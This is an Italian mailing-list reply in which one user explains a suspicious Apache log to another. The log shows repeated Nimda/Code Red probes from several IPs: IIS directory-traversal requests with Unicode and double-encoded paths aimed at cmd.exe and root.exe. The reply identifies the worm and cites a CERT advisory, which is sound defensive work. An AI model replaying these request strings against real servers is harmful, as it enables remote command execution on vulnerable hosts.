[glux] Re: Sicurezza
Giuseppe Butti
giuseppebutti@yahoo.it
Fri, 4 Oct 2002 14:29:19 +0200 (CEST)
--- Bonfanti Claudio <bonfanti.claudio@promo.it> ha
scritto: > Ciao, proprio ieri sera parlevamo di
attacchi. Oggi
> ho guardato il primo report di Apache e mi č
> sembrato di rilevare
> cose strane. Puoi dargli una occhiata tu che sei pių
> esperto? i punti strani sono quelli dove ci sono
> riferimenti a /scripts o
> programmi esegubili CMD.EXE . e via dicendo.
> Magari č un falso allarme ma la prudenza non č mai
> troppa.
>
> Grazie per la pazienza
> Claudio
>
> -----log------
> 61.219.84.27 - - [03/Oct/2002:09:24:48 +0200] "GET /
> HTTP/1.1" 400 398 "-" "-"
> 80.116.9.57 - - [03/Oct/2002:11:04:31 +0200] "GET /
> HTTP/1.1" 400 398 "-" "-"
> 80.206.70.214 - - [03/Oct/2002:17:08:14 +0200] "GET
> / HTTP/1.1" 200 2492 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 4.0)"
> 80.206.70.214 - - [03/Oct/2002:17:08:14 +0200] "GET
> /image/back1.jpg HTTP/1.1" 200 730
> "http://80.206.70.211" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 4.0)"
> 80.206.70.214 - - [03/Oct/2002:17:08:14 +0200] "GET
> /image/Gamma2.jpg HTTP/1.1" 200 25751
> "http://80.206.70.211" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 4.0)"
> 80.15.116.160 - - [03/Oct/2002:18:37:40 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:40 +0200] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:41 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:41 +0200] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:41 +0200] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 323 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:41 +0200] "GET
>
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 340 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:42 +0200] "GET
>
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 340 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:42 +0200] "GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:42 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:43 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:43 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:43 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:43 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 306 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:43 +0200] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 306 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:44 +0200] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 323 "-" "-"
> 80.15.116.160 - - [03/Oct/2002:18:37:44 +0200] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 323 "-" "-"
> 212.78.3.26 - - [03/Oct/2002:19:34:52 +0200] "GET /
> HTTP/1.1" 200 2492 "-" "Mozilla/5.0 (X11; U; Linux
> i686; en-US; rv:1.1a) Gecko/20020610"
> 212.78.3.26 - - [03/Oct/2002:19:34:54 +0200] "GET
> /image/back1.jpg HTTP/1.1" 200 730
> "http://80.206.70.211/" "Mozilla/5.0 (X11; U; Linux
> i686; en-US; rv:1.1a) Gecko/20020610"
> 212.78.3.26 - - [03/Oct/2002:19:34:54 +0200] "GET
> /image/Gamma2.jpg HTTP/1.1" 200 25751
> "http://80.206.70.211/" "Mozilla/5.0 (X11; U; Linux
> i686; en-US; rv:1.1a) Gecko/20020610"
> 80.35.232.209 - - [03/Oct/2002:22:29:54 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:29:55 +0200] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:29:55 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:29:56 +0200] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:29:56 +0200] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 323 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:29:57 +0200] "GET
>
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 340 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:29:57 +0200] "GET
>
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 340 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:29:58 +0200] "GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:29:58 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:29:59 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:29:59 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:30:00 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:30:00 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 306 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:30:01 +0200] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 306 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:30:02 +0200] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 323 "-" "-"
> 80.35.232.209 - - [03/Oct/2002:22:30:02 +0200] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 323 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:53 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:54 +0200] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:54 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:55 +0200] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:55 +0200] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 323 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:56 +0200] "GET
>
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 340 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:56 +0200] "GET
>
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 340 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:56 +0200] "GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:56 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:57 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:57 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:58 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:58 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 306 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:58 +0200] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 400 306 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:59 +0200] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 323 "-" "-"
> 80.24.45.117 - - [03/Oct/2002:23:09:59 +0200] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 323 "-" "-"
> 80.33.143.250 - - [04/Oct/2002:00:14:13 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
> 80.33.143.250 - - [04/Oct/2002:00:14:13 +0200] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
> 80.33.143.250 - - [04/Oct/2002:00:14:14 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-" "-"
> 80.33.143.250 - - [04/Oct/2002:00:14:14 +0200] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-" "-"
> 80.33.143.250 - - [04/Oct/2002:00:14:14 +0200] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 323 "-" "-"
> 80.33.143.250 - - [04/Oct/2002:00:14:15 +0200] "GET
>
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 340 "-" "-"
> 80.33.143.250 - - [04/Oct/2002:00:14:16 +0200] "GET
>
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 340 "-" "-"
> 80.33.143.250 - - [04/Oct/2002:00:14:16 +0200] "GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356 "-" "-"
> 80.33.143.250 - - [04/Oct/2002:00:14:17 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
=== message truncated ===
E' quasi sicuramente un tentativo di attacco
effettuato
dal worm Nimda/Code Red. Non preoccuparti perchč
infetta solo sistemi Windows con web server IIS.
Se vuoi saperne di pių segui questo link:
http://www.cert.org/advisories/CA-2001-26.html
Stasera butto gių un scriptino per mandare per mail
i log giornalieri di Apache.
Ciao
Giuseppe
______________________________________________________________________
Mio Yahoo!: personalizza Yahoo! come piace a te
http://it.yahoo.com/mail_it/foot/?http://it.my.yahoo.com/